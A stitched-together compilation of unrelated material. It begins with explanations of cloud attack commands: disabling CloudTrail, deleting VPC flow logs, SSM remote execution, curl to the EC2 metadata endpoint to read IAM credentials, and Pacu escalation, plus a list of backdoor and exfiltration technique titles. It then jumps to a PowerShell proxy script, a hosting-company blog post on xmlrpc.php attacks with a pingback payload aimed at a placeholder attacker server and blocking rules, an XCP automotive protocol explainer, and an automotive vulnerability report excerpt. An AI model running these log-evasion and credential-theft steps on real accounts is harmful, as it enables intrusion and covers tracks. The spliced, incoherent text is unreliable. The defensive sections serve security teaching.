--name <trail_name>: Specifies the name of the CloudTrail trail to stop logging for (passed to the aws cloudtrail stop-logging command). Replace <trail_name> with the actual name of the trail.
--region <region>: Specifies the AWS region where the CloudTrail trail is located. Replace <region> with the appropriate region identifier, such as us-east-1 or eu-west-2.
import boto3: This imports the Boto3 library, which is the AWS SDK for Python.
boto3.client('cloudtrail'): This creates a client object for the CloudTrail service using Boto3.
.stop_logging(Name='<trail_name>'): This invokes the stop_logging method of the CloudTrail client to stop logging for a specific trail. The method takes only the trail name; the region is set when the client is created, e.g. boto3.client('cloudtrail', region_name='<region>').
Name='<trail_name>': Specifies the name of the CloudTrail trail to stop logging for. Replace <trail_name> with the actual name of the trail.
region_name='<region>': Set on the client rather than on the call. Replace <region> with the appropriate region identifier, such as us-east-1 or eu-west-2.
terraform init: Initializes the Terraform working directory, downloading the necessary provider plugins and modules.
terraform import aws_cloudtrail.this <trail_arn>: Imports the existing CloudTrail resource into the Terraform state. Replace <trail_arn> with the actual ARN (Amazon Resource Name) of the CloudTrail resource you want to manage with Terraform.
terraform apply -auto-approve -var 'enable_logging=false': Applies the Terraform configuration, making changes to the infrastructure. The -auto-approve flag skips the interactive approval step, while the -var flag sets the variable enable_logging to false. This variable is used in the Terraform configuration to control whether CloudTrail logging is enabled or disabled.
Attempt to Leave the AWS Organization
aws organizations leave-organization: The Organizations CLI has no deregister-account subcommand; run from the member account itself, leave-organization attempts to remove that account from its organization (it takes no account argument). From the management account, aws organizations remove-account-from-organization --account-id <account_id> removes a member account instead.
--account-id <account_id>: Used with remove-account-from-organization. Replace <account_id> with the actual ID of the account you want to remove.
--region <region>: Specifies the AWS region for the API call. Organizations is a global service, so this is typically us-east-1.
import boto3: Imports the Boto3 library, which provides an interface to interact with AWS services.
boto3.client('organizations').leave_organization(): Creates a client for the AWS Organizations service using Boto3 and calls the leave_organization method on it. From the management account, call remove_account_from_organization(AccountId='<account_id>') instead, replacing <account_id> with the actual ID of the AWS account to remove.
terraform init: Initializes the Terraform configuration in the current directory.
terraform import aws_organizations_account.this <account_id>: Imports an existing AWS account into Terraform. The aws_organizations_account.this resource represents an AWS account in the Terraform configuration, and <account_id> should be replaced with the actual ID of the AWS account you want to manage.
terraform apply -auto-approve -var 'enable_organization=false': Applies the Terraform configuration and provisions or updates resources. The -auto-approve flag automatically approves the execution without requiring user confirmation. The -var 'enable_organization=false' flag sets the value of the enable_organization variable to false, indicating that the AWS Organization should be disabled.
Remove VPC Flow Logs
aws ec2 delete-flow-logs: Executes the AWS CLI command to delete VPC flow logs.
--flow-log-ids <flow_log_ids>: Specifies the IDs of the flow logs to be deleted. <flow_log_ids> should be replaced with the actual IDs of the flow logs you want to delete.
--region <region>: Specifies the AWS region where the flow logs are located. <region> should be replaced with the appropriate region identifier, such as us-east-1 or eu-west-2.
import boto3: Imports the Boto3 library, which is the official AWS SDK for Python.
ec2 = boto3.client('ec2'): Creates an EC2 client object using Boto3.
ec2.delete_flow_logs(FlowLogIds=['<flow_log_id_1>', '<flow_log_id_2>']): Calls the delete_flow_logs method of the EC2 client to delete VPC flow logs. Replace <flow_log_id_1> and <flow_log_id_2> with the actual IDs of the flow logs you want to delete.
terraform init: Initializes the Terraform working directory by downloading the necessary provider plugins and configuring the backend.
terraform import aws_flow_log.this <flow_log_id>: Imports an existing VPC flow log into the Terraform state. Replace <flow_log_id> with the actual ID of the flow log you want to manage with Terraform. This command associates the flow log with the Terraform resource named aws_flow_log.this.
terraform destroy -auto-approve: Destroys the Terraform-managed resources specified in the configuration files. The -auto-approve flag is used to automatically approve the destruction without requiring user confirmation.
Execute Discovery Commands on an EC2 Instance
aws ecs execute-command: The AWS CLI subcommand (ECS Exec) for running a command inside a running ECS task or container.
--cluster / --task / --container: These options select the target cluster, task, and container within the ECS cluster in which to execute the command.
--command / --interactive: Specify the command to run and request an interactive session, respectively.
aws ssm send-command: This is the AWS CLI command to interact with AWS Systems Manager and send a command.
--instance-ids <instance_id>: This option specifies the ID of the instance(s) to which the command should be sent. You can provide a single instance ID or a comma-separated list of multiple instance IDs.
--document-name "AWS-RunShellScript": This option specifies the name of the Systems Manager document to use. In this case, the command is using the built-in document “AWS-RunShellScript,” which allows running shell commands on the target instances.
--parameters '{"commands":["<command_1>", "<command_2>", "<command_3>"]}': This option specifies the parameters for the command. The commands parameter is an array of shell commands to be executed on the instances.
--region <region>: This option specifies the AWS region where the instances are located.
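The --parameters value is again inline JSON; a small Python sketch of assembling it locally (the discovery commands here are placeholder assumptions, substitute your own):

```python
import json

# Placeholder discovery commands to run via AWS-RunShellScript (assumptions)
commands = ["whoami", "hostname", "cat /etc/passwd"]

# Equivalent of the literal string passed to: --parameters '{"commands":[...]}'
parameters = json.dumps({"commands": commands})
print(parameters)
```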
import boto3: This imports the Boto3 library, which provides an interface to interact with AWS services using Python.
ssm = boto3.client('ssm'): This creates an SSM (Systems Manager) client object using the boto3.client() method. The client object allows interaction with AWS Systems Manager.
ssm.send_command(...): This invokes the send_command() method of the SSM client to send a command to the specified instance(s).
InstanceIds=['<instance_id>']: This parameter specifies the ID of the instance(s) to which the command should be sent. You can provide a single instance ID or a list of multiple instance IDs.
DocumentName='AWS-RunShellScript': This parameter specifies the name of the Systems Manager document to use. In this case, the command is using the built-in document “AWS-RunShellScript,” which allows running shell commands on the target instances.
Parameters={'commands':['<command_1>', '<command_2>', '<command_3>']}: This parameter specifies the parameters for the command. The commands parameter is a list of shell commands to be executed on the instances.
terraform init: This command initializes the Terraform working directory by downloading and configuring the necessary providers and modules.
terraform import aws_instance.this <instance_id>: This command imports an existing EC2 instance into the Terraform state. It associates the specified <instance_id> with the aws_instance.this resource in the Terraform configuration.
terraform apply -auto-approve -var 'command="<command_1>; <command_2>; <command_3>"': This command applies the Terraform configuration and provisions or modifies the infrastructure as necessary. The -auto-approve flag skips the interactive approval prompt. The -var flag sets a variable named command to the provided value, which represents a series of shell commands <command_1>; <command_2>; <command_3> to be executed on the EC2 instance.
Download EC2 Instance User Data
aws ec2 describe-instance-attribute --instance-id <instance_id> --attribute userData --query "UserData.Value" --output text --region <region>: This AWS CLI command describes the specified EC2 instance attribute, which in this case is the user data. The <instance_id> parameter is the ID of the EC2 instance for which you want to retrieve the user data, and the <region> parameter specifies the AWS region where the instance is located. The --query option extracts the value of the UserData.Value attribute, and the --output option sets the output format to text.
base64 --decode: This command decodes the base64-encoded user data retrieved from the previous AWS CLI command. The --decode option instructs the base64 command to perform the decoding operation.
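The decode step can be reproduced in Python with the standard base64 module; the encoded string below is a made-up stand-in for real instance user data:

```python
import base64

# Stand-in for the base64 text returned by describe-instance-attribute (assumption)
encoded_user_data = base64.b64encode(b"#!/bin/bash\necho hello").decode()

# Equivalent of piping the value through `base64 --decode`
decoded = base64.b64decode(encoded_user_data).decode()
print(decoded)
```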
import boto3: This imports the Boto3 library, which is the official AWS SDK for Python.
ec2 = boto3.client('ec2'): This creates an EC2 client object using Boto3.
response = ec2.describe_instance_attribute(InstanceId='<instance_id>', Attribute='userData'): This calls the describe_instance_attribute method of the EC2 client to retrieve the specified attribute of the EC2 instance. The <instance_id> parameter is the ID of the EC2 instance, and the Attribute parameter is set to 'userData' to retrieve the user data.
print(base64.b64decode(response['UserData']['Value']).decode()): This retrieves the value of the 'UserData' key from the response, which contains the base64-encoded user data, decodes it with base64.b64decode() (the standard base64 module must also be imported), and prints the decoded user data to the console. (The .decode('base64') string method seen in older examples is Python 2 only.)
terraform init: Initializes the Terraform working directory, downloading any necessary providers and setting up the environment.
terraform import aws_instance.this <instance_id>: Imports an existing EC2 instance into the Terraform state. This associates the EC2 instance in the AWS account with the corresponding Terraform resource.
terraform apply -auto-approve -var 'instance_id=<instance_id>': Applies the Terraform configuration and provisions any required resources. The -auto-approve flag skips the interactive confirmation prompt, and the -var flag sets the value of the instance_id variable used within the Terraform configuration.
Launch Unusual EC2 instances
--image-id <image_id>: Specifies the ID of the Amazon Machine Image (AMI) to use as the base for the EC2 instance. It defines the operating system and other software installed on the instance.
--instance-type p2.xlarge: Specifies the instance type, which determines the hardware specifications (such as CPU, memory, and storage capacity) of the EC2 instance. In this case, p2.xlarge is the instance type.
--count 1: Specifies the number of instances to launch. In this case, it launches a single instance.
--region <region>: Specifies the AWS region in which to launch the instance. The region defines the geographical location where the EC2 instance will be provisioned.
The -var 'instance_type=p2.xlarge' option is used to set a variable named instance_type to the value p2.xlarge. This variable can be referenced in the Terraform configuration files to dynamically configure resources.
import boto3: Imports the Boto3 library, which provides an interface to interact with AWS services using Python.
ec2 = boto3.resource('ec2'): Creates an EC2 resource object using Boto3. This resource object allows us to interact with EC2 instances.
instance = ec2.create_instances(ImageId='<image_id>', InstanceType='p2.xlarge', MinCount=1, MaxCount=1): Creates a new EC2 instance using the specified image ID and instance type. The MinCount and MaxCount parameters are both set to 1, indicating that a single instance should be launched.
print(instance[0].id): Prints the ID of the created EC2 instance. The instance variable is a list, and instance[0] refers to the first (and in this case, the only) instance in the list. The .id attribute retrieves the ID of the instance.
Execute Commands on EC2 Instance via User Data
Open Ingress Port 22 on a Security Group
Exfiltrate an AMI by Sharing It
Exfiltrate EBS Snapshot by Sharing It
Exfiltrate RDS Snapshot by Sharing
Backdoor an S3 Bucket via its Bucket Policy
Console Login without MFA
Backdoor an IAM Role
Create an Access Key on an IAM User
Create an administrative IAM User
Create a Login Profile on an IAM User
Backdoor Lambda Function Through Resource-Based Policy
Overwrite Lambda Function Code
Create an IAM Roles Anywhere trust anchor
Execute Command on Virtual Machine using Custom Script Extension
Execute Commands on Virtual Machine using Run Command
Export Disk Through SAS URL
Create an Admin GCP Service Account
Create a GCP Service Account Key
Impersonate GCP Service Accounts
Privilege escalation through KMS key policy modifications
Enumeration of EKS clusters and associated resources
Privilege escalation through RDS database credentials
Enumeration of open S3 buckets and their contents
Privilege escalation through EC2 instance takeover
Enumeration of AWS Glue Data Catalog databases
Privilege escalation through assumed role sessions
Enumeration of ECS clusters and services
Privilege escalation through hijacking AWS SDK sessions
Enumeration of ECR repositories with public access
Privilege escalation through hijacking AWS CLI sessions
Enumeration of Elastic Beanstalk environments with public access
Privilege escalation by attaching an EC2 instance profile
Stealing EC2 instance metadata
Enumeration of EC2 instances with public IP addresses
Enumeration of AWS Systems Manager parameters
Privilege escalation through EC2 metadata
curl: The command-line tool used to perform the HTTP request.
http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>: The URL endpoint of the instance metadata service used to retrieve the security credentials for the specified IAM role. Replace <role_name> with the name of the IAM role.
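The security-credentials endpoint returns a JSON document containing temporary keys; the sketch below parses a sample of that shape (all values here are fabricated placeholders, and no metadata service is contacted):

```python
import json

# Placeholder response shaped like the IMDS security-credentials document (fabricated values)
imds_response = """{
  "Code": "Success",
  "AccessKeyId": "ASIAEXAMPLE",
  "SecretAccessKey": "examplesecretkey",
  "Token": "exampletoken",
  "Expiration": "2030-01-01T00:00:00Z"
}"""

creds = json.loads(imds_response)
# These three fields are what an attacker would export as AWS_* environment variables
print(creds["AccessKeyId"], creds["SecretAccessKey"][:4], creds["Token"][:4])
```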
In this command, the pacu.py script is being executed with the escalate_iam_roles method, which is specifically designed to escalate privileges associated with IAM roles. The --profile option specifies the AWS profile to use for authentication, and the --regions option specifies the AWS regions to target. The --instances option is used to specify the target EC2 instance ID(s) on which the IAM roles will be escalated.
AWS cross-account enumeration
python3 cloudmapper.py: Executes the CloudMapper tool using the Python 3 interpreter.
enum --account <account_id> --regions <aws_regions>: Specifies the enumeration mode and provides additional parameters to configure the account and regions to scan.
--account <account_id>: Specifies the AWS account ID to scan. Replace <account_id> with the actual AWS account ID you want to enumerate.
--regions <aws_regions>: Specifies the AWS regions to scan. Replace <aws_regions> with a comma-separated list of AWS regions (e.g., us-east-1,us-west-2) you want to include in the enumeration.
python3 pacu.py: Executes the PACU tool using the Python 3 interpreter.
--method enum_organizations: Specifies the specific method to run, in this case enum_organizations, which is responsible for enumerating AWS Organizations.
--profile <aws_profile>: Specifies the AWS profile to use for authentication. Replace <aws_profile> with the name of the AWS profile configured on your system.
--regions <aws_regions>: Specifies the AWS regions to target for enumeration. Replace <aws_regions> with a comma-separated list of AWS regions (e.g., us-east-1,us-west-2) you want to include in the enumeration.
aws sts assume-role: Initiates the assume-role operation using the AWS Security Token Service (STS).
--role-arn arn:aws:iam::<target_account_id>:role/<role_name>: Specifies the ARN (Amazon Resource Name) of the IAM role you want to assume. Replace <target_account_id> with the ID of the AWS account that owns the role, and <role_name> with the name of the IAM role.
--role-session-name <session_name>: Specifies the name for the session associated with the assumed role. Replace <session_name> with a descriptive name for the session.
<#
.Synopsis
This function will set the proxy settings provided as input to the cmdlet.
.Description
This function will set the proxy server and (optional) Automatic configuration script.
.Parameter Proxy
This parameter is set as the proxy server for the system.
This parameter is Mandatory.
.Example
Setting proxy information.
Set-NetProxy -proxy "proxy:7890"
.Example
Setting proxy information and (optional) Automatic Configuration Script.
Set-NetProxy -proxy "proxy:7890" -acs "http://proxy:7892"
#>
Function Set-NetProxy
{
[CmdletBinding()]
Param(
[Parameter(Mandatory=$True,ValueFromPipeline=$true,ValueFromPipelineByPropertyName=$true)]
[String[]]$Proxy,
[Parameter(Mandatory=$False,ValueFromPipeline=$true,ValueFromPipelineByPropertyName=$true)]
[AllowEmptyString()]
[String[]]$acs
)
Begin
{
$regKey="HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
}
Process
{
Set-ItemProperty -path $regKey ProxyEnable -value 1
Set-ItemProperty -path $regKey ProxyServer -value $proxy
if($acs)
{
Set-ItemProperty -path $regKey AutoConfigURL -Value $acs
}
}
End
{
Write-Output "Proxy is now enabled"
Write-Output "Proxy Server : $proxy"
if ($acs)
{
Write-Output "Automatic Configuration Script : $acs"
}
else
{
Write-Output "Automatic Configuration Script : Not Defined"
}
}
}
Function Disable-NetProxy
{
Begin
{
$regKey="HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
}
Process
{
Set-ItemProperty -path $regKey ProxyEnable -value 0 -ErrorAction Stop
Set-ItemProperty -path $regKey ProxyServer -value "" -ErrorAction Stop
Set-ItemProperty -path $regKey AutoConfigURL -Value "" -ErrorAction Stop
}
End
{
Write-Output "Proxy is now Disabled"
}
}
The xmlrpc.php file can be found in the WordPress core and is generally enabled by default, which leaves your WordPress site exposed to all kinds of malicious attacks.
We are going to look at what the XMLRPC file is, what it does, and, more importantly, how to manage it while boosting your website’s security.
XML-RPC (eXtensible Markup Language – Remote Procedure Call) was created to offer cross-platform communication. This is a protocol that uses HTTP as a transport and XML as an encoder to generate procedure calls, thus allowing for the ability to run functions on a remote computer.
HTTP requests can be sent by the client (i.e., browser or mobile app) to the server, and the server then sends an HTTP response. The HTTP request can be used to invoke functions, and these functions can then be used to perform specific actions.
This is different from the REST API, which uses URL parameters to identify resources; XML-RPC instead passes the method name and its arguments in the body of the request.
XMLRPC allows users to interact with their site remotely, such as through the WordPress mobile app or via plugins like JetPack or WooCommerce.
The Security Issues Associated With The xmlrpc.php File
XMLRPC can expose your site to a variety of attacks. Since it’s easy to trace, hackers can send arbitrary XML data, which then allows them to control the site in a number of ways. Here are some security issues that you should know about.
Brute Force Attacks
In a brute force attack, the hackers essentially try to guess the correct password and user name using pure brute force – by attempting thousands of combinations.
If you have a weak admin password and aren’t using multi-factor authentication, there’s a chance that a hacker can brute force their way into your website’s backend.
WPSCAN, a popular tool from Kali Linux, can be used to easily find and list all valid usernames for the website. Once that’s done, hackers can use brute force via the xmlrpc.php file by sending the following request:
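The request body typically used for this is an XML-RPC call to a credentialed method such as wp.getUsersBlogs; the sketch below assembles one attempt in Python (the username and password are placeholder guesses, and nothing is sent anywhere):

```python
# Build one xmlrpc.php brute-force attempt (wp.getUsersBlogs takes a username and password)
request_template = """<?xml version="1.0"?>
<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
    <param><value><string>{user}</string></value></param>
    <param><value><string>{password}</string></value></param>
  </params>
</methodCall>"""

# Placeholder guess; a real attack would POST thousands of these bodies to /xmlrpc.php
body = request_template.format(user="admin", password="password123")
print(body)
```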
This way, hackers can send thousands of combinations until the site accepts a correct password. Even when the input is incorrect, the response simply invites the attacker to try again:
The server returns an HTTP 200 code even though the username and password are incorrect; the failure is only signalled inside the XML response body. Hackers don’t even have to worry about reCaptchas or limited login attempts if security is low.
DDoS Attacks
Distributed Denial of Service, or DDoS attacks, can completely take a server offline by sending thousands of requests simultaneously. The pingback feature in WordPress is commonly used by hackers in combination with the xmlrpc.php file to run DDoS attacks.
Usually, hackers find a page that they can target multiple times and then start attacking it. To start the attack, the hacker begins by checking for the xmlrpc.php file. They do this by sending this request:
Once the hackers have confirmation that the xmlrpc.php file is enabled, they then start attacking it with a network of exploited websites to send different pingback requests.
In many cases, this can be automated using the following code:
Cross-site Port Attacks (XSPA) are quite common. Hackers generally initiate these attacks by injecting malicious code to receive information about IP addresses and TCP ports.
Hackers use the pingback.ping technique to pingback a post on a website, which returns the IP address. Then, they use a sniffer to establish an endpoint to send a live blog post URL and a pingback using the following request:
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://<YOUR SERVER>:<port></string></value></param>
    <param><value><string>http://<SOME VALID BLOG POST FROM THE SITE></string></value></param>
  </params>
</methodCall>
How to Block XMLRPC Attacks
There are several methods you can use to block XMLRPC attacks; most of the ones you’ll come across are ineffective. Here’s how we recommend addressing this:
How Accelerated Domains and Servebolt CDN Handles XMLRPC Issues
Servebolt has two products that perform XMLRPC security out of the box. They both take the approach that some traffic to this endpoint can be valid, but too much or too often is a sign of a hack attempt.
For example, our Accelerated Domains implementation listens for requests to xmlrpc.php; if there are more than 15 requests in a minute, it bans that IP address for a whole day. This effectively stops the hack attempt while allowing users of the website via WordPress Mobile, or users of Jetpack/WooCommerce, to continue to work.
The Servebolt CDN deals with it slightly differently: it also has a threshold of 15 requests per minute from the same IP address to xmlrpc.php, but it bans the IP address for 1 hour.
If you’ve already made the (wise 😄) decision to host your WordPress websites with us – when using Servebolt’s CDN or Accelerated Domains – one of these security options is automatically implemented for you.
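The threshold logic described above (N requests per rolling minute per IP, then a temporary ban) can be sketched as follows; the exact window and ban durations are taken from the text, everything else is an illustrative assumption:

```python
import time
from collections import defaultdict, deque

WINDOW = 60          # seconds per rolling window
LIMIT = 15           # max xmlrpc.php requests per window (per the text)
BAN_SECONDS = 3600   # ban duration; the Servebolt CDN example uses 1 hour

hits = defaultdict(deque)  # ip -> timestamps of recent xmlrpc.php requests
banned_until = {}          # ip -> time at which the ban lifts

def allow(ip, now=None):
    """Return True if this xmlrpc.php request should be served."""
    now = time.time() if now is None else now
    if banned_until.get(ip, 0) > now:
        return False
    q = hits[ip]
    q.append(now)
    while q and q[0] <= now - WINDOW:   # drop hits older than the window
        q.popleft()
    if len(q) > LIMIT:                  # over the threshold: ban the IP
        banned_until[ip] = now + BAN_SECONDS
        return False
    return True
```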
Blocking XMLRPC on Cloudflare
It is possible to block traffic to xmlrpc.php directly on Cloudflare, stopping it from ever reaching your server.
This is only a really valid solution if you are also blocking traffic that is not originating from Cloudflare. If you have not already set this up, then it will still be possible for hackers to attempt to access and exploit it on your origin server directly. And, of course, this is easily configurable in just a single click via the Servebolt admin interface.
Where this will help is that, like with Accelerated Domains or CDN from Servebolt, thexmlrpc.phptraffic from bad actors is stopped at the edge long before it reaches the server.
To block all traffic, login to Cloudflare admin, select the domain, click Security, click WAF, create a new firewall rule, and enter the details as shown in the photo below:
Rule Name = whatever you want to call it
Field = URI Path
Operator = equals
Value = /xmlrpc.php
Or you can “edit the expression” and paste in the following code:
(http.request.uri.path eq "/xmlrpc.php")
Choose the action of “Block” and save & deploy it.
Remember: because you have set this up, you will have to remember that it exists. There may come a time when you are wondering why xmlrpc.php is not working, and you cannot see anything about it in your server configuration.
Note: if you use this method, you must ensure that your server is configured to allow only traffic that comes through Cloudflare, as otherwise the block could be bypassed by going to the origin directly.
In Servebolt, this can be enabled in the control panel:
Alternative Method: Disabling XMLRPC On The Server Altogether
On Apache Servers
A better alternative is to disable the XMLRPC file altogether. On Apache, this is possible by adding a snippet of code to your .htaccess file, just before the rules added by WordPress:
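A commonly used rule for this, shown here as an assumed example since exact snippets vary, denies all access to the file (Apache 2.4+ syntax):

```apacheconf
# Block every request to xmlrpc.php before WordPress' own rules run.
# Apache 2.2 would use "Order Deny,Allow" plus "Deny from all" instead.
<Files xmlrpc.php>
    Require all denied
</Files>
```

With this in place, requests to /xmlrpc.php receive a 403 Forbidden response directly from Apache.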
This is a wise option as it eliminates the misuse of XMLRPC, though there’s a downside: you’ll be disabling remote access to your site. As a result, the mobile app – or Jetpack, for that matter – won’t work properly.
On Nginx Servers
Disabling XMLRPC on Nginx is slightly harder, as you need server configuration access rather than Apache's simpler .htaccess. To disable it, edit the virtual host config file, usually located in /etc/nginx/sites-available, and add the following directive to the server block:
server {
    # your standard server root and configuration

    location = /xmlrpc.php {
        deny all;
    }

    # rest of the server configuration, such as PHP-FPM
}
Servebolt uses the .htaccess method to deploy this solution for xmlrpc.php. If you are with a managed host and using Nginx, you will most likely need them to implement this for you.
Why Installing a Security Plugin Isn’t a Wise Idea
Most people might be thinking of installing a WordPress security plugin on their site. However, that’s not actually a good idea for several reasons:
The requests to xmlrpc.php will still happen, with the security plugin sitting between them and WordPress, consuming system resources, so the site will fail more quickly in the event of an attack.
They are primarily effective at the application level, not at the server level.
They add unnecessary code to your site, affecting its performance.
They require constant load management.
Security plugins interfere with crucial parts of WordPress security, including login; a single mistake in code that runs as part of the login flow puts your site at greater risk.
Conclusion
Cyberattacks are getting more sophisticated day by day. As a webmaster and business owner, it’s essential to be aware of and understand potential threats and the steps you can take to protect yourself against them. The majority of these threats can be mitigated with a proactive approach: a combination of monitoring and keeping software up to date, as well as taking advantage of solutions like Accelerated Domains. When enabled, Accelerated Domains or Servebolt CDN intelligently filters traffic and automatically takes action to protect your website from harmful attacks, ultimately keeping your origin server secure and your site safe.
Any specific questions about XMLRPC or security? Get in touch with us – our expert, friendly, and thorough support team is here to help.
XCP data is exchanged as messages between an XCP master (the measurement/calibration tool or system) and an XCP slave (an ECU, runtime environment, etc.).
Before describing the XCP message frame, a brief summary of the XCP communication model: communication via XCP packets is divided into one area for commands (CTO) and one area for the transfer of synchronous data (DTO).
※ CTO (Command Transfer Object): packets used to transfer commands
※ DTO (Data Transfer Object): packets used to exchange measurement/stimulation data synchronously
The CTO/DTO-based XCP communication model
The abbreviations used in the communication model above are as follows.
Abbreviation – Expansion – Description
CMD – Command Packet – command transfer
RES – Command Response Packet – positive response
ERR – Error – negative response
EV – Event Packet – asynchronous event
SERV – Service Request Packet – service request
DAQ – Data AcQuisition – periodic transfer of measured values
STIM – Stimulation – periodic stimulation of the slave
The entire XCP message frame is embedded in the frame of the transport layer (e.g., for XCP on Ethernet, inside a UDP or TCP packet).
The XCP message frame and the meaning of each field are described below.
XCP Message Frame
Term – Description
XCP Message (Frame) – the form of message exchanged between the master and slave in XCP
XCP Header – depends on the transport protocol (CAN, FlexRay, CAN FD, Ethernet, etc.)
XCP Tail – depends on the transport protocol (CAN, FlexRay, CAN FD, Ethernet, etc.)
XCP Packet – the data used in XCP communication
Identification field – the packet identifier used in XCP communication; it lets the master and slave determine which message was sent
PID – the field used to identify a packet. When transferring a CTO, the PID field identifies CMD, RES, or other CTO packets; the XCP slave responds or sends notifications to the master using PID values 0xFC–0xFF. When transferring a DTO, other elements of the identification field (FILL, DAQ, etc.) are also used.
FILL – a field used for alignment; used with the DAQ (Data Acquisition) measurement method to collect data for specific events and signals
DAQ – XCP measures the values of specific parameters via read access; for this, events and parameters must be mapped, and information about the measurement method (period) is required. This mapping information is stored in DAQ lists, and this field gives the number of the DAQ list.
Timestamp Field – indicates the transmission time of the message (used only for DTO messages); the slave uses timestamps to attach time information to measured values
TIMESTAMP – the master receiving a DTO thus obtains both the measured value and the time at which the slave acquired it; used for synchronization
Data Field – the XCP packet also carries the data specified in the data field
DATA – for CTO packets, this holds the parameters of the command; for DTO packets, it holds the measured values sent by the slave (TIMESTAMP holds the time of measurement, DATA the values themselves)
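As a rough sketch of the frame layout above: for XCP on Ethernet, the header consists of a 16-bit length (LEN) and a 16-bit counter (CTR), and there is no tail. The example below packs and parses such a frame around a CONNECT command; the PID constants follow the standard CTO numbering, but the code is illustrative, not a complete transport implementation.

```python
import struct

# CTO packet identifiers (slave -> master responses use 0xFC-0xFF).
PID_RES, PID_ERR, PID_EV, PID_SERV = 0xFF, 0xFE, 0xFD, 0xFC
CMD_CONNECT = 0xFF  # master -> slave CONNECT command

def build_frame(ctr, packet):
    """XCP on Ethernet: header = LEN + CTR (16-bit little-endian), no tail."""
    return struct.pack("<HH", len(packet), ctr) + packet

def parse_frame(frame):
    """Split a received frame back into (ctr, xcp_packet)."""
    length, ctr = struct.unpack_from("<HH", frame)
    return ctr, frame[4:4 + length]

# CONNECT command: PID 0xFF followed by the mode byte (0x00 = normal mode).
frame = build_frame(0, bytes([CMD_CONNECT, 0x00]))
ctr, packet = parse_frame(frame)
```

On CAN, by contrast, the identification is carried by the CAN identifier itself, so the header and tail fields differ per transport, as the table above notes.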
Reference
Andreas Patzer, Rainer Zaiser, XCP – The Standard Protocol for ECU Development: Fundamentals and Application Areas (Vector, 2014)
[Part 1]
1. Overview
2. Key Findings
3. Methodology
4. Automotive Vulnerabilities – Finding a Needle in a Haystack
4.1 Severity vs. Relevance
4.2 Notorious Supply-Chain Vulnerabilities
[Part 2]
5. Risks of Outdated Software
6. Memory Corruption Affecting Automotive Software
7. Conclusion
1. Overview
The connected car has become a reality. Connected cars represent an important milestone on the way to autonomous-driving technology that will transform traditional transportation and mobility services. This progress, however, brings challenges.
Without effective cybersecurity measures against the growing cyber risks facing the automotive industry, modern vehicles with their broad attack surface are inevitably exposed to malicious activity that can cause physical damage, affecting the safety of drivers and pedestrians alike.
Industry-wide awareness of these threats is evident in international standards such as UNECE WP.29 and ISO/SAE 21434. Both require OEMs to take responsibility for automotive cybersecurity by managing the various risks associated with suppliers, service providers, and other organizations, and both drive a fundamental shift in automotive cybersecurity centered on the following:
1) Adopting a “shift left” approach that addresses security issues early in product design and development
2) Managing cybersecurity across the entire vehicle lifecycle: development, production, operation, and decommissioning
3) Strengthening cybersecurity responsibility across the automotive supply chain
Managing cyber risk in the automotive sector is not simple, however: product security teams must handle the wide range of security issues that arise every day with limited staff, while also supporting automotive manufacturers’ digital transformation.
The ‘2021 Automotive Software Security Report’ from Cybellum, an Israeli company specializing in automotive cybersecurity risk assessment, highlights the key security risks in automotive software, based on an analysis of vulnerabilities found in more than 100 automotive software components between 2020 and 2021.
2. Key Findings
1) Automotive software vulnerabilities differ from “typical” vulnerabilities
More vulnerabilities were disclosed in 2020 than ever before, but only a small fraction of them affect automotive software. This is because the automotive industry is complex and involves many different suppliers. Detecting the vulnerabilities that threaten automotive security is as hard as finding a needle in a haystack.
2) Automotive software is affected by supply-chain vulnerabilities
Because the automotive supply chain consists of many interdependent suppliers, it is affected both by vulnerabilities discovered long ago and by newly discovered ones. According to Cybellum’s research, automotive software is affected both by fairly old vulnerabilities such as BlueBorne, discovered four years earlier, and by recently discovered ones such as Ripple20.
3) Outdated software can create operational risk
Vehicle manufacturers currently run a large amount of outdated software. Notably, 90% of the automotive ECUs Cybellum analyzed were running software more than five years old, even though secure, up-to-date versions were available. Software that is not kept up to date can cause serious operational cybersecurity problems.
4) Memory corruption threatens automotive software security
Most of the coding weaknesses affecting automotive software stem from errors in memory management. Memory-corruption vulnerabilities such as buffer overflows, null dereferences, and use-after-free bugs were discovered years ago and are considered low-risk weaknesses, yet they have recently been found to have a significant impact on automotive software security.
3. Methodology
Through the ‘2021 Automotive Software Security Report’, Cybellum provides an in-depth analysis of the current state of automotive software security. The core of the report is an analysis of more than 100 automotive software components examined between 2020 and 2021; some of the information in the report is based on open-source software.
4. Automotive Vulnerabilities
Finding a Needle in a Haystack
To minimize the damage from attacks that exploit vulnerabilities, it is important to prioritize mitigation, but the sharp rise in vulnerabilities targeting vehicles is slowing down severity-based prioritization. In particular, because not every publicly disclosed vulnerability affects automotive software, clearly identifying the vulnerabilities relevant to vehicles is difficult, and as a result some vulnerabilities are not mitigated and resolved in time. Ultimately, this can harm the cyber resilience of vehicle components and of organizations in the automotive industry.
Table 1 – Published CVE (Common Vulnerabilities and Exposures) vulnerabilities (source: NIST NVD, https://nvd.nist.gov)
If software input is not properly validated, an attacker can manipulate input by abusing a particular format, causing the application to receive unintended input values. Because this can lead to control-flow hijacking, arbitrary control over resources, or arbitrary code execution, vulnerabilities that can adversely affect the software must be properly identified.
In this regard, comparing the 10 CVEs most searched for on Google with the automotive-software-related CVEs analyzed by Cybellum (Table 2 below) shows that the list of common vulnerabilities and the list of vulnerabilities affecting automotive software differ greatly. The CVEs most searched for on Google mostly affect enterprise and IT products, which are quite different from the embedded systems found in vehicles.
Most searched CVEs (source: Google)
CVE               CVSS score   Affected software
CVE-2019-0708     9.8          Remote Desktop Services
CVE-2017-11882    7.8          Microsoft Office
CVE-2017-0199     7.8          Microsoft Office
CVE-2018-11776    8.1          Apache Struts
CVE-2017-5638     10           Jakarta Multipart parser
CVE-2019-5544     9.8          OpenSLP (ESXi / Horizon DaaS)
CVE-2017-0143     8.1          SMBv1 server (Microsoft Windows)
CVE-2020-0549     5.5          Intel(R) Processors
CVE-2020-2555     9.8          Oracle Coherence
CVE-2018-7600     9.8          Drupal

Top automotive CVEs (source: Cybellum)
CVE               CVSS score   Affected software
CVE-2020-11656    9.8          SQLite
CVE-2019-19646    9.8          SQLite
CVE-2019-8457     9.8          SQLite
CVE-2019-5482     9.8          cURL
CVE-2018-16842    9.1          cURL
CVE-2018-14618    9.8          cURL
CVE-2017-12652    9.8          libpng
